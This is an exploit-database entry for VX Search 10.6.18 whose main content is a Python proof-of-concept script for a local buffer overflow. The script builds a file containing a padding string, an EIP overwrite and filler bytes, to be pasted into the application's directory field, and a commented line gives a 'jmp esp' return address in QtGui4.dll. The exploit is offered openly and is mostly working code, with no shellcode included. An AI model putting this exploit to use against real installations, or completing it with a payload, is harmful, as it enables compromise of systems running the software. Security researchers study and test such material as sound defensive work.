VX Search 10.6.18 - directory Local Buffer Overflow Exploit

2018-04-18T00:00:00
ID 1337DAY-ID-30204
Type zdt
Reporter Kevin McGuigan
Modified 2018-04-18T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #!/usr/bin/python
# Title: VX Search 10.6.18 Local Buffer Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.vxsearch.com
# Version: 10.6.18
# Tested on: Windows 7 32-bit
# Vendor did not respond to advisory. 
 
# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field. 
 
filename="vxsearchPOC.txt"
junk = "A"*271
#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)
#eip="\x1a\x2a\x2c\x65"
eip = "B" * 4
fill = "C" *900
buffer = junk + eip + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

#  0day.today [2018-04-20]  #